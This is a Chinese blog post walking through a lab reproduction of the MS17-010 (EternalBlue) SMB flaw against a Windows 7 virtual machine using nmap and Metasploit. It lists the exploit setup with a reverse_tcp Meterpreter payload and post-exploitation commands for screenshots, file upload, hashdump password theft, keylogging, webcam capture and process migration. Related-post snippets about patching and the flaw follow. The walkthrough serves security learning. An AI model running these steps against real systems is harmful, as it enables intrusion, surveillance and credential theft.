MS17-010漏洞复现

已于 2023-07-08 15:19:54 修改
阅读量342 收藏
点赞数
分类专栏: 网络安全 文章标签: 我的网安学习之路 漏洞复现
于 2023-07-08 15:13:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xufenglai123/article/details/131612189
版权
  • 官方描述:Microsoft Security Bulletin MS17-010 - Critical | Microsoft Learn
  • 漏洞描述:
    • Microsoft Windows SMB Server远程代码执行漏洞,Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。
  • 涉及系统版本
    • Microsoft Windows Server 2016、Microsoft WindowsServer 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft WindowsServer 2008、Microsoft Windows RT 8.1等等
  • 漏洞复现:
    • 工具资料准备
      • kali系统
      • nmap、msf
      • vmware 
      • win7 靶机
    • 复现过程
      • 1.登录kali,切换root

      • 查看当前所处网段

      • 查看win7的IP以及kali和win7的联通情况
        • ipconfig

        • ping 192.168.24.129

      • 使用nmap扫描win7:
        • nmap -T4 -A -v -Pn 192.168.24.129
        • 发现445端口开启状态

      • 启用msf:
        • msfconsole

      • 搜索漏洞:
        • search ms17-010
        • 显示如下模块:

        • 字段说明
          • name:模块名
            • exploit攻击模块
            • auxiliary辅助扫描模块
          • disclosure Date:漏洞纰漏时间
          • Rank:可靠性等级

          • check:该模块是否支持漏洞检测
          • description:漏洞或模块的详细介绍
      • 使用永恒之蓝模块并配置参数
        • use 0
        • 会出现如下图提示,没有荷载,默认使用window/x64/meterpreter/reverse_tcp荷载,设置荷载,设置受害者主机以及服务主机如下图:

        • 也可以通过show playloads 命令查看当前模块所有的攻击载荷

      • 配置完使用show options 查看配置参数

        • 可以看到受害主机192.168.24.129,端口445
        • 以及服务主机信息

      • 渗透
        • 渗透成功,提示 目标主机 Meterpreter session 1 opened

        • 获取受害者系统桌面快照 使用screenshot

        • 打开图片

        • 将图片上传到C盘目录下 使用 upload /home/kali/AKEZNoiU.jpeg C:\\heihei.jpeg
        • 切换到win7,查看对应目录

        • 下载图片到kali桌面

        • 如图

        • 查看win7用户权限 getuid
          • Windows命令为:getuid
          • Linux命令为:whoami
          • 发现当前为管理员权限

        • 进入shell

        • 可以利用shell对账号进行提权
        • 获取账号密码 hashdump

        • 通过md5解析网站获取密码明文
      • 后渗透命令收集:
        • screenshot //桌面截图
        • shell //进入的就是DOS系统 受害者win7的cmd命令行
        • chcp 65001 //改变编码方式,改乱码
        • whoami //查看受害者当前用户及权限
        • windows系统最高权限:system(系统权限)
        • 从命令行退回
          • meterpreter:exit
          • ctrl+c
        • 拍照:
          • webcam_list //检测摄像头设备
          • webcam_snap //拍照
          • webcam_stream //摄影,视频
        • 键盘监听:
          • ps //查看windows系统运行进程
          • migrate -P 进程的PID
          • keyscan_start //开始监听
          • keyscan_dump //获取监听
          • keyscan_stop //停止监听
        • 抓取密码:
          • hashdump //抓取加密之后的密码
          • 加密方式:MD5 在线解密网站:https://www.cmd5.com/
          • creds_wdigest //工具kiwi抓取密码的命令
            • 如图

Windows - SMB 远程代码执行漏洞(永恒之蓝) - CVE-2017-0146 & MS17-010
Blue17 の 小窝
03-22 1165
永恒之蓝漏洞MS 17-010
MS17-010 补丁
05-15
此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 有关此更新的更多信息,请参阅 Microsoft 知识库文章 4013389。
ms17-010漏洞
ababb_的博客
10-14 219
MS17-010漏洞是一种影响微软Windows操作系统的严重漏洞,也被称为永恒之蓝(EternalBlue)。该漏洞于2017年3月由Shadow Brokers组织公开,引发了全球范围内的网络攻击事件。MS17-010漏洞存在于Windows操作系统的SMBv1协议中。攻击者可以通过发送特制的网络数据包来利用漏洞,从而执行远程代码并获取目标系统的控制权。这使得攻击者能够在未经授权的情况下执行恶意操作,如加密文件、传播恶意软件等。
微软的补丁服务器,Microsoft 安全公告 MS17-010 - 严重
weixin_35458961的博客
08-04 1396
10/11/2017本文内容MSRC ppDocument 模板Microsoft 安全公告 MS17-010 - 严重Microsoft Windows SMB 服务器安全更新 (4013389)发布日期:2017 年 3 月 14 日**版本:**1.0执行摘要此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的...
MS17-010漏洞复现+利用
最新发布
Nove1205的博客
07-22 2180
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
MS17-010漏洞分析与复现
qq_43443410的博客
07-30 1687
  一名网络空间安全专业学生所做的漏洞复现实验,如有错误或有待改进的地方,还请大家多多指教。 MS17-010漏洞分析与复现1 前置知识2 漏洞简介3 漏洞代码简析4 复现5 可能遇到的问题5.1 在Meterpreter中开启vnc后无法控制目标计算机,只能监视。 1 前置知识   SMB(Server Message Block,服务器消息块): 一个网络文件共享协议,它允许应用程序和终端用户从远端的文件服务器访问文件资源,能被用于Web链接和客户端与服务器之间的信息沟通。该协议提供了Windows.
ms17-010漏洞复现(正向连接+反向连接)
qq_53733257的博客
07-15 1334
攻击机和目标机一定要能互相通信,否则就要调试设置网络适配器以及查看目标机防火墙是否关闭,直到能够互相通信为止。,完成后不要关闭终端,让他一直挂在后台。set rhosts 192.168.21.19 #设置模块3的参数,将rhosts设置成目标机ip。set rhosts 192.168.21.19 #设置模块0的参数,将rhosts设置成目标机ip。4、使用编号为3的模块,对目标机进行扫描,确认该目标机是否存在ms17-010漏洞。5、利用模块0,对目标机进行攻击,模块0的利用方式步骤和模块3相同。
Windows网络服务渗透测试实战`MS17-010漏洞复现的学习
GUN_C的博客
11-14 1135
永恒之蓝,渗透基础
ms17-010漏洞复现
10-22
下面是ms17-010漏洞复现过程: 1. 使用nmap进行探测,发现开启445端口,该端口可能会存在MS17-010漏洞。 2. 使用MSF的永恒之蓝漏洞模块。 3. 使用ms17-010扫描模块,对靶机进行扫描。 4. 使用ms17-010攻击模块,对...
ms17-010 漏洞复现-主要用来学习交流
qq_30302577的博客
12-12 4939
ms17-010 漏洞复现-主要用来学习交流(32位系统) 目录: 文章目录ms17-010 漏洞复现-主要用来学习交流(32位系统)一.漏洞原理1.简介2.漏洞原理代码详解二.漏洞复现1.目标信息收集2. 尝试攻击2.1. 查看漏洞模块 search ms17-0102.2. 可以先使用辅助模块来扫描测试 auxiliary/scanner/smb/smb_ms17_0102.3 使用攻击模...
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
记录学习
06-21 5786
msf永恒之蓝漏洞复现过程以及修复建议
ms17-010(永恒之蓝) 漏洞复现与处理
2401_84972648的博客
05-17 1024
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
勒索病毒尝试解决方法
灵感点滴的分享
05-16 8454
解决方案 该攻击涉及MS17-010漏洞,我们可以采用以下方案进行解决 漏洞名称: Microsoft Windows SMB远程任意代码执行漏洞 (MS17-010) 包含如下CVE: CVE-2017-0143 严重 远程命令执行 CVE-2017-0144 严重 远程命令执行 CVE-2017-0145 严重 远程命令执行 CVE-2017-0146 严重 远程命令执行
网络安全-MS17-010漏洞-永恒之蓝
weixin_48137911的博客
02-14 3962
攻击主机上打开了目标机器的桌面,攻击成功,这个时候只要我把它原本的账户删了,不断电的情况下,我想干嘛干嘛,他就再也进不来了,除非断电,重装。这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了。账户已经建立了,试想一波,如果我是真正的入侵者,我都有你账户了,我进你系统不是轻轻松松,账户密码都是我自己设置的。.无论怎么输入都没用,因为这个账号已经被我删掉了,或者我想放什么恶意程序木马在里面,隐藏起来,他也不知道的呀~
MS17_010永恒之蓝漏洞利用与安全加固复现记录
wdnmddbl的博客
06-13 1177
路漫漫其修远兮,吾将上下而求索。EternalBlue达到其攻击目的事实上利用了3个独立的漏洞:第一个也就是 CVE-2017-0144被用于引发越界内存写;第二个漏洞则用于绕过内存写的长度限制;第三个漏洞被用于攻击数据的内存布局。如果病毒成功入侵或攻击端口,就会从远程服务器下载病毒代码,进而横向传播给局域网内其他电脑。同时,该病毒还会在被感染电脑中留下后门病毒,以准备进行后续的恶意攻击,不排除未来会向用户电脑传播更具威胁性病毒的可能性,例如勒索病毒等。
Microsoft Windows SMB信息泄露漏洞
tombai007的博客
01-22 2500
CVE(CAN) ID: CVE-2021-36960 Microsoft Windows是一款由美国微软公司开发的窗口化操作系统。 Microsoft Windows SMB存在信息泄露漏洞。攻击者可通过与其他漏洞结合的方式利用该漏洞执行任意代码。
打补丁来修复ms17-010
2301_76815548的博客
04-05 613
不同的系统不同的补丁号。下载之后运行就可以了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值